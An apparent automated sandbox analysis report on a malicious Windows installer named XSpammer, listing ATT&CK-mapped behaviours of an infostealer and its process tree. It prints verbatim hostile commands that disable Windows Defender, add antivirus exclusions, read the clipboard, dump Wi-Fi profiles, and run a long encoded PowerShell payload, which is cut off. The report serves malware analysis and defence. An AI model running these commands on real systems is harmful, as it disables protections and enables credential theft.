3b278965a9bc1f64fe6f120c753e19079962a035529b0d7143ee5de3be1c3b9f

Analysis

max time kernel
150s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
14/04/2025, 03:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XSpammer-Windows-Installer.exe
Size

78.4MB
MD5

3fea7be3e7408542c5d571ed82819307
SHA1

257ed424e5c043e3d64e5a98332a04ba42eb4ff9
SHA256

3b278965a9bc1f64fe6f120c753e19079962a035529b0d7143ee5de3be1c3b9f
SHA512

342164f6dbed1ab38b651eb406194663404e739cbfd33c11162abe4f601c2590e2c4cebb90337cef0441b5c242cda72e2cc42c659e1c35948dd0c575eb85e3e3
SSDEEP

1572864:HZzMgaq98HmYOY1TltopGun6WF4DCe620hpeDhghTQBlGJk054uzzJth1jYpa3:SK9OVTtopGyPKERhpeDGGlG2sDHV1jim

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4632	powershell.exe
1724	powershell.exe
4108	powershell.exe
4748	powershell.exe
2228	powershell.exe
4508	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation	XSpammer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3027557611-1484967174-339164627-1000\Control Panel\International\Geo\Nation	XSpammer.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5124	powershell.exe
5376	cmd.exe

Executes dropped EXE 7 IoCs

pid	Process
452	bound.exe
4520	rar.exe
5436	XSpammer.exe
4616	XSpammer.exe
4196	XSpammer.exe
1100	XSpammer.exe
3568	XSpammer.exe

Loads dropped DLL 33 IoCs

pid	Process
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
828	XSpammer-Windows-Installer.exe
452	bound.exe
452	bound.exe
452	bound.exe
452	bound.exe
452	bound.exe
452	bound.exe
452	bound.exe
5436	XSpammer.exe
4616	XSpammer.exe
4196	XSpammer.exe
4616	XSpammer.exe
4616	XSpammer.exe
4616	XSpammer.exe
4616	XSpammer.exe
1100	XSpammer.exe
3568	XSpammer.exe
3568	XSpammer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2928	tasklist.exe
4248	tasklist.exe
3152	tasklist.exe
4700	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024254-22.dat	upx
behavioral1/memory/828-26-0x00007FFE89430000-0x00007FFE89A19000-memory.dmp	upx
behavioral1/files/0x0007000000024246-28.dat	upx
behavioral1/memory/828-31-0x00007FFE9EA00000-0x00007FFE9EA24000-memory.dmp	upx
behavioral1/files/0x0007000000024252-30.dat	upx
behavioral1/files/0x0007000000024245-42.dat	upx
behavioral1/memory/828-53-0x00007FFE9E900000-0x00007FFE9E919000-memory.dmp	upx
behavioral1/memory/828-54-0x00007FFE9CA30000-0x00007FFE9CA5D000-memory.dmp	upx
behavioral1/files/0x0007000000024249-52.dat	upx
behavioral1/memory/828-50-0x00007FFEA1800000-0x00007FFEA180F000-memory.dmp	upx
behavioral1/files/0x000700000002424d-49.dat	upx
behavioral1/files/0x000700000002424c-48.dat	upx
behavioral1/files/0x000700000002424b-47.dat	upx
behavioral1/files/0x000700000002424a-46.dat	upx
behavioral1/files/0x0007000000024248-44.dat	upx
behavioral1/files/0x0007000000024247-43.dat	upx
behavioral1/files/0x0007000000024259-41.dat	upx
behavioral1/files/0x0007000000024258-40.dat	upx
behavioral1/files/0x0007000000024257-39.dat	upx
behavioral1/files/0x0007000000024253-36.dat	upx
behavioral1/files/0x0007000000024251-35.dat	upx
behavioral1/memory/828-60-0x00007FFE9A1C0000-0x00007FFE9A1E3000-memory.dmp	upx
behavioral1/memory/828-62-0x00007FFE88E40000-0x00007FFE88FB0000-memory.dmp	upx
behavioral1/memory/828-66-0x00007FFE9C720000-0x00007FFE9C72D000-memory.dmp	upx
behavioral1/memory/828-65-0x00007FFE9C770000-0x00007FFE9C789000-memory.dmp	upx
behavioral1/memory/828-73-0x00007FFE88AC0000-0x00007FFE88E35000-memory.dmp	upx
behavioral1/memory/828-72-0x00007FFE98760000-0x00007FFE98818000-memory.dmp	upx
behavioral1/memory/828-78-0x00007FFE9C710000-0x00007FFE9C71D000-memory.dmp	upx
behavioral1/memory/828-77-0x00007FFE99610000-0x00007FFE99624000-memory.dmp	upx
behavioral1/memory/828-75-0x00007FFE9EA00000-0x00007FFE9EA24000-memory.dmp	upx
behavioral1/memory/828-71-0x00007FFE99CB0000-0x00007FFE99CDE000-memory.dmp	upx
behavioral1/memory/828-70-0x00007FFE89430000-0x00007FFE89A19000-memory.dmp	upx
behavioral1/memory/828-106-0x00007FFE81140000-0x00007FFE8125C000-memory.dmp	upx
behavioral1/memory/828-105-0x00007FFE9A1C0000-0x00007FFE9A1E3000-memory.dmp	upx
behavioral1/memory/828-125-0x00007FFE88E40000-0x00007FFE88FB0000-memory.dmp	upx
behavioral1/memory/828-210-0x00007FFE9C770000-0x00007FFE9C789000-memory.dmp	upx
behavioral1/memory/828-409-0x00007FFE88AC0000-0x00007FFE88E35000-memory.dmp	upx
behavioral1/memory/828-406-0x00007FFE98760000-0x00007FFE98818000-memory.dmp	upx
behavioral1/memory/828-403-0x00007FFE99CB0000-0x00007FFE99CDE000-memory.dmp	upx
behavioral1/memory/828-867-0x00007FFE88E40000-0x00007FFE88FB0000-memory.dmp	upx
behavioral1/memory/828-862-0x00007FFE9EA00000-0x00007FFE9EA24000-memory.dmp	upx
behavioral1/memory/828-861-0x00007FFE89430000-0x00007FFE89A19000-memory.dmp	upx
behavioral1/memory/828-1106-0x00007FFE89430000-0x00007FFE89A19000-memory.dmp	upx
behavioral1/memory/828-1151-0x00007FFE98760000-0x00007FFE98818000-memory.dmp	upx
behavioral1/memory/828-1155-0x00007FFE81140000-0x00007FFE8125C000-memory.dmp	upx
behavioral1/memory/828-1154-0x00007FFE88AC0000-0x00007FFE88E35000-memory.dmp	upx
behavioral1/memory/828-1153-0x00007FFE99610000-0x00007FFE99624000-memory.dmp	upx
behavioral1/memory/828-1152-0x00007FFE89430000-0x00007FFE89A19000-memory.dmp	upx
behavioral1/memory/828-1150-0x00007FFE99CB0000-0x00007FFE99CDE000-memory.dmp	upx
behavioral1/memory/828-1149-0x00007FFE9C710000-0x00007FFE9C71D000-memory.dmp	upx
behavioral1/memory/828-1148-0x00007FFE9C770000-0x00007FFE9C789000-memory.dmp	upx
behavioral1/memory/828-1147-0x00007FFE88E40000-0x00007FFE88FB0000-memory.dmp	upx
behavioral1/memory/828-1146-0x00007FFE9A1C0000-0x00007FFE9A1E3000-memory.dmp	upx
behavioral1/memory/828-1145-0x00007FFE9E900000-0x00007FFE9E919000-memory.dmp	upx
behavioral1/memory/828-1144-0x00007FFE9CA30000-0x00007FFE9CA5D000-memory.dmp	upx
behavioral1/memory/828-1143-0x00007FFEA1800000-0x00007FFEA180F000-memory.dmp	upx
behavioral1/memory/828-1142-0x00007FFE9EA00000-0x00007FFE9EA24000-memory.dmp	upx
behavioral1/memory/828-1141-0x00007FFE9C720000-0x00007FFE9C72D000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4144	cmd.exe
1408	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4564	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2024	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4632	powershell.exe
4748	powershell.exe
4748	powershell.exe
4632	powershell.exe
1724	powershell.exe
1724	powershell.exe
4108	powershell.exe
4108	powershell.exe
1724	powershell.exe
1724	powershell.exe
4108	powershell.exe
4108	powershell.exe
1568	powershell.exe
1568	powershell.exe
5124	powershell.exe
5124	powershell.exe
5124	powershell.exe
1568	powershell.exe
452	bound.exe
452	bound.exe
4700	tasklist.exe
4700	tasklist.exe
2228	powershell.exe
2228	powershell.exe
5808	powershell.exe
5808	powershell.exe
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
4456	powershell.exe
4456	powershell.exe
1100	XSpammer.exe
1100	XSpammer.exe
1100	XSpammer.exe
1100	XSpammer.exe
3568	XSpammer.exe
3568	XSpammer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4632	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	2928	tasklist.exe
Token: SeDebugPrivilege	4248	tasklist.exe
Token: SeIncreaseQuotaPrivilege	376	WMIC.exe
Token: SeSecurityPrivilege	376	WMIC.exe
Token: SeTakeOwnershipPrivilege	376	WMIC.exe
Token: SeLoadDriverPrivilege	376	WMIC.exe
Token: SeSystemProfilePrivilege	376	WMIC.exe
Token: SeSystemtimePrivilege	376	WMIC.exe
Token: SeProfSingleProcessPrivilege	376	WMIC.exe
Token: SeIncBasePriorityPrivilege	376	WMIC.exe
Token: SeCreatePagefilePrivilege	376	WMIC.exe
Token: SeBackupPrivilege	376	WMIC.exe
Token: SeRestorePrivilege	376	WMIC.exe
Token: SeShutdownPrivilege	376	WMIC.exe
Token: SeDebugPrivilege	376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	376	WMIC.exe
Token: SeRemoteShutdownPrivilege	376	WMIC.exe
Token: SeUndockPrivilege	376	WMIC.exe
Token: SeManageVolumePrivilege	376	WMIC.exe
Token: 33	376	WMIC.exe
Token: 34	376	WMIC.exe
Token: 35	376	WMIC.exe
Token: 36	376	WMIC.exe
Token: SeDebugPrivilege	3152	tasklist.exe
Token: SeDebugPrivilege	5124	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeIncreaseQuotaPrivilege	376	WMIC.exe
Token: SeSecurityPrivilege	376	WMIC.exe
Token: SeTakeOwnershipPrivilege	376	WMIC.exe
Token: SeLoadDriverPrivilege	376	WMIC.exe
Token: SeSystemProfilePrivilege	376	WMIC.exe
Token: SeSystemtimePrivilege	376	WMIC.exe
Token: SeProfSingleProcessPrivilege	376	WMIC.exe
Token: SeIncBasePriorityPrivilege	376	WMIC.exe
Token: SeCreatePagefilePrivilege	376	WMIC.exe
Token: SeBackupPrivilege	376	WMIC.exe
Token: SeRestorePrivilege	376	WMIC.exe
Token: SeShutdownPrivilege	376	WMIC.exe
Token: SeDebugPrivilege	376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	376	WMIC.exe
Token: SeRemoteShutdownPrivilege	376	WMIC.exe
Token: SeUndockPrivilege	376	WMIC.exe
Token: SeManageVolumePrivilege	376	WMIC.exe
Token: 33	376	WMIC.exe
Token: 34	376	WMIC.exe
Token: 35	376	WMIC.exe
Token: 36	376	WMIC.exe
Token: SeDebugPrivilege	4700	tasklist.exe
Token: SeSecurityPrivilege	452	bound.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeIncreaseQuotaPrivilege	5604	WMIC.exe
Token: SeSecurityPrivilege	5604	WMIC.exe
Token: SeTakeOwnershipPrivilege	5604	WMIC.exe
Token: SeLoadDriverPrivilege	5604	WMIC.exe
Token: SeSystemProfilePrivilege	5604	WMIC.exe
Token: SeSystemtimePrivilege	5604	WMIC.exe
Token: SeProfSingleProcessPrivilege	5604	WMIC.exe
Token: SeIncBasePriorityPrivilege	5604	WMIC.exe
Token: SeCreatePagefilePrivilege	5604	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 396 wrote to memory of 828	396	XSpammer-Windows-Installer.exe	88
PID 396 wrote to memory of 828	396	XSpammer-Windows-Installer.exe	88
PID 828 wrote to memory of 540	828	XSpammer-Windows-Installer.exe	90
PID 828 wrote to memory of 540	828	XSpammer-Windows-Installer.exe	90
PID 828 wrote to memory of 4484	828	XSpammer-Windows-Installer.exe	91
PID 828 wrote to memory of 4484	828	XSpammer-Windows-Installer.exe	91
PID 4484 wrote to memory of 4748	4484	cmd.exe	94
PID 4484 wrote to memory of 4748	4484	cmd.exe	94
PID 540 wrote to memory of 4632	540	cmd.exe	95
PID 540 wrote to memory of 4632	540	cmd.exe	95
PID 828 wrote to memory of 4600	828	XSpammer-Windows-Installer.exe	96
PID 828 wrote to memory of 4600	828	XSpammer-Windows-Installer.exe	96
PID 828 wrote to memory of 5736	828	XSpammer-Windows-Installer.exe	97
PID 828 wrote to memory of 5736	828	XSpammer-Windows-Installer.exe	97
PID 828 wrote to memory of 5684	828	XSpammer-Windows-Installer.exe	100
PID 828 wrote to memory of 5684	828	XSpammer-Windows-Installer.exe	100
PID 4600 wrote to memory of 1724	4600	cmd.exe	102
PID 4600 wrote to memory of 1724	4600	cmd.exe	102
PID 5684 wrote to memory of 4108	5684	cmd.exe	103
PID 5684 wrote to memory of 4108	5684	cmd.exe	103
PID 828 wrote to memory of 5956	828	XSpammer-Windows-Installer.exe	104
PID 828 wrote to memory of 5956	828	XSpammer-Windows-Installer.exe	104
PID 828 wrote to memory of 424	828	XSpammer-Windows-Installer.exe	105
PID 828 wrote to memory of 424	828	XSpammer-Windows-Installer.exe	105
PID 5956 wrote to memory of 2928	5956	cmd.exe	109
PID 5956 wrote to memory of 2928	5956	cmd.exe	109
PID 828 wrote to memory of 2340	828	XSpammer-Windows-Installer.exe	110
PID 828 wrote to memory of 2340	828	XSpammer-Windows-Installer.exe	110
PID 828 wrote to memory of 5376	828	XSpammer-Windows-Installer.exe	111
PID 828 wrote to memory of 5376	828	XSpammer-Windows-Installer.exe	111
PID 424 wrote to memory of 4248	424	cmd.exe	114
PID 424 wrote to memory of 4248	424	cmd.exe	114
PID 828 wrote to memory of 2876	828	XSpammer-Windows-Installer.exe	115
PID 828 wrote to memory of 2876	828	XSpammer-Windows-Installer.exe	115
PID 828 wrote to memory of 6116	828	XSpammer-Windows-Installer.exe	117
PID 828 wrote to memory of 6116	828	XSpammer-Windows-Installer.exe	117
PID 828 wrote to memory of 4144	828	XSpammer-Windows-Installer.exe	118
PID 828 wrote to memory of 4144	828	XSpammer-Windows-Installer.exe	118
PID 828 wrote to memory of 2792	828	XSpammer-Windows-Installer.exe	120
PID 828 wrote to memory of 2792	828	XSpammer-Windows-Installer.exe	120
PID 828 wrote to memory of 3824	828	XSpammer-Windows-Installer.exe	123
PID 828 wrote to memory of 3824	828	XSpammer-Windows-Installer.exe	123
PID 5736 wrote to memory of 452	5736	cmd.exe	108
PID 5736 wrote to memory of 452	5736	cmd.exe	108
PID 5736 wrote to memory of 452	5736	cmd.exe	108
PID 2340 wrote to memory of 376	2340	cmd.exe	125
PID 2340 wrote to memory of 376	2340	cmd.exe	125
PID 5376 wrote to memory of 5124	5376	cmd.exe	126
PID 5376 wrote to memory of 5124	5376	cmd.exe	126
PID 2876 wrote to memory of 3152	2876	cmd.exe	167
PID 2876 wrote to memory of 3152	2876	cmd.exe	167
PID 6116 wrote to memory of 1264	6116	cmd.exe	129
PID 6116 wrote to memory of 1264	6116	cmd.exe	129
PID 2792 wrote to memory of 2024	2792	cmd.exe	130
PID 2792 wrote to memory of 2024	2792	cmd.exe	130
PID 3824 wrote to memory of 1568	3824	cmd.exe	131
PID 3824 wrote to memory of 1568	3824	cmd.exe	131
PID 4144 wrote to memory of 1408	4144	cmd.exe	132
PID 4144 wrote to memory of 1408	4144	cmd.exe	132
PID 828 wrote to memory of 1636	828	XSpammer-Windows-Installer.exe	173
PID 828 wrote to memory of 1636	828	XSpammer-Windows-Installer.exe	173
PID 1636 wrote to memory of 4276	1636	cmd.exe	135
PID 1636 wrote to memory of 4276	1636	cmd.exe	135
PID 452 wrote to memory of 2648	452	bound.exe	136

C:\Users\Admin\AppData\Local\Temp\XSpammer-Windows-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\XSpammer-Windows-Installer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:396
- C:\Users\Admin\AppData\Local\Temp\XSpammer-Windows-Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\XSpammer-Windows-Installer.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XSpammer-Windows-Installer.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XSpammer-Windows-Installer.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:452
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq XSpammer.exe" | %SYSTEMROOT%\System32\find.exe "XSpammer.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2648
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq XSpammer.exe"
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4700
      - C:\Windows\SysWOW64\find.exe
        
        C:\Windows\System32\find.exe "XSpammer.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5956
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:424
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:6116
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4144
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhA